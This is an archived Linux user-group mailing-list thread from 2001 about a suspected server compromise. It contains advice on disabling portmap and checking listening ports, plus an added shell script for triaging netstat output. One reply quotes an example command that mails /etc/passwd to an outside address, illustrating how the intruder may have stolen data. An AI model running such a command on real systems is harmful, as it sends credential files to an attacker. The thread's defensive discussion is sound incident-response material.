Tugger the SLUGger! SLUG Mailing List Archives

RE: [SLUG] Security Breach


Hi,

In this context, what are ports 587 and 1024? I couldn't find these in
/etc/services.


tcp        0      0 0.0.0.0:587             0.0.0.0:*               LISTEN
tcp        0      0 0.0.0.0:1024            0.0.0.0:*               LISTEN

Bernhard Lüder

This electronic mail is solely for the use of the addressee and may contain
information that is confidential or privileged.  If you receive this
electronic mail in error, please delete it from your system immediately and
notify the sender by electronic mail.


-----Original Message-----
From: slug-admin@xxxxxxxxxxx [mailto:slug-admin@xxxxxxxxxxx] On Behalf Of
Umar Goldeli
Sent: Wednesday, February 28, 2001 11:37 AM
To: Sean Carmody
Cc: slug@xxxxxxxxxxx
Subject: Re: [SLUG] Security Breach


> Feb 28 01:53:07 emu portmap[12152]: connect from 202.157.133.184 to
> getport(status): request from unauthorized host

Why are you running the portmapper? Turn it off if you don't specifically
need it.

A "netstat -an | grep LISTEN" will show you "evilthings(tm)" ;)

If you don't recognize it as something you specifically need - turn it
off. :)

Either way, chances are that this is not how they got in - he probably did
an rpcinfo -p <yourip> or similar and your config recognized that he
wasn't allowed.

As above - if you don't need portmap, turn it off.

> Has anyone come across something similar? I've no idea whether this is
> the result of a trojan, or whether someone managed to gain access to
> my machine (although if they did gain root access, why mail out a passwd
> file?). Any thoughts?

Remember - root access is generally the *eventual* goal... just because he
got in as userx, doesn't mean he has root, or even a shell for that
matter. It could be as simple as a buffer overflow with something like
"/bin/mailx < /etc/passwd bob@xxxxxxxxxxx" etc.. (or something like
that)..

It could be anything.. either way - you know that something has
happened. Make an executive decision on whether it has (I think it
has) and pull the box from production, rebuild it, secure it, patch it,
then change all user passwords (if any).

If you can, pull the box out of prod and put in a new box while you
examine the compromised one.

//umar.
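The two practical steps in this thread are Umar's "netstat -an | grep LISTEN" and Bernhard's follow-up of looking each listening port up in /etc/services. The script below is an added example (editor's code, not posted by either participant) that does both in one pass: it takes netstat output, keeps only the LISTEN sockets, and resolves each port against a services table, printing UNKNOWN for anything the table does not list. The netstat lines and the services excerpt are constructed for the example (modelled on the lines quoted above); the function names are the editor's. An UNKNOWN result only means the services file has no entry for that port, not that the listener is hostile; on a live box the next step is to find the owning process with something like "netstat -lnp" or "lsof -i" and decide, as Umar says, whether you specifically need it.

```shell
#!/bin/sh
# Added example, not from the original thread: triage netstat listeners
# against /etc/services. Everything below is constructed sample data.

# Constructed netstat -an sample (same column layout as the thread's lines).
SAMPLE_NETSTAT='tcp        0      0 0.0.0.0:25              0.0.0.0:*               LISTEN
tcp        0      0 0.0.0.0:111             0.0.0.0:*               LISTEN
tcp        0      0 0.0.0.0:587             0.0.0.0:*               LISTEN
tcp        0      0 0.0.0.0:1024            0.0.0.0:*               LISTEN
tcp        0      0 127.0.0.1:6010          0.0.0.0:*               LISTEN
tcp        0      0 192.168.1.5:22          192.168.1.9:51812       ESTABLISHED'

# Constructed excerpt in /etc/services format: name port/proto [aliases] [# comment].
# Hypothetical table for the example, deliberately missing 587 and 1024.
SAMPLE_SERVICES='# hypothetical excerpt, not a real /etc/services
ssh             22/tcp
smtp            25/tcp          mail
sunrpc          111/tcp         portmapper      # RPC 4.0 portmapper
sunrpc          111/udp         portmapper'

# lookup_service PORT PROTO SERVICES_TEXT
# Prints the service name for PORT/PROTO, or UNKNOWN if the table has no entry.
lookup_service() {
    port=$1; proto=$2; services=$3
    name=$(printf '%s\n' "$services" | awk -v want="$port/$proto" '
        $0 !~ /^#/ && $2 == want { print $1; exit }')
    printf '%s\n' "${name:-UNKNOWN}"
}

# list_listeners NETSTAT_TEXT SERVICES_TEXT
# One line per LISTEN socket: proto port bind-address service-name
list_listeners() {
    netstat_text=$1; services=$2
    printf '%s\n' "$netstat_text" | awk '$NF == "LISTEN" { print $1, $4 }' |
    while read -r proto laddr; do
        proto=${proto%6}          # fold tcp6/udp6 into tcp/udp for the lookup
        port=${laddr##*:}         # text after the last colon is the port
        addr=${laddr%:*}          # everything before it is the bind address
        name=$(lookup_service "$port" "$proto" "$services")
        printf '%s %s %s %s\n' "$proto" "$port" "$addr" "$name"
    done
}

# unknown_listeners NETSTAT_TEXT SERVICES_TEXT
# Prints only the listening ports that have no entry in the services table.
unknown_listeners() {
    list_listeners "$1" "$2" | awk '$4 == "UNKNOWN" { print $2 }'
}

# Stand-alone run on the constructed sample. On a real host you would feed
# "$(netstat -an)" and "$(cat /etc/services)" instead.
list_listeners "$SAMPLE_NETSTAT" "$SAMPLE_SERVICES"
```

On the constructed sample this prints five listeners; ports 25 and 111 resolve to smtp and sunrpc, while 587, 1024 and 6010 come back UNKNOWN because the sample table has no line for them, which is exactly the situation Bernhard describes. The 111/tcp entry is the portmapper Umar recommends turning off when it is not needed.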



--
SLUG - Sydney Linux User Group Mailing List - http://slug.org.au/
More Info: http://slug.org.au/lists/listinfo/slug